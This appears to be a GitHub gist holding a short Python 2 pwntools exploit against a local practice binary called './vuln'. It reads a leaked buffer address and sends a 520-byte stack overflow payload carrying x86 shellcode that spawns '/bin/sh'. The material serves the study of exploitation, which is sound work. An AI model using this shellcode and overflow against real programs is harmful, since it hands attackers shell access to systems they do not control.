@shankaraman
Last active August 29, 2015 14:22
Exploit using Binjitsu
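# Python 2 script (print statement, str payloads)
from pwn import *

# Start the local target binary
p = process('./vuln')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')  # loaded but not used below

# The target prints two lines, each with a hex address after a colon
data = p.recvline().strip()
fn_b_addr = int(data.split(":")[1], 16)  # parsed but not used below
#print hex(fn_b_addr)
data = p.recvline().strip()
buffer_addr = int(data.split(":")[1], 16)
print hex(buffer_addr)

# x86 shellcode that calls execve on the trailing "/bin/sh" string
payload = "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"
# Pad the payload to 520 bytes, then append the leaked buffer address
# packed as a 32-bit little-endian value
junk = 'a'
payload += junk*(520-len(payload))
payload += p32(buffer_addr)
p.sendline(payload)
raw_input()  # wait for Enter before the script exits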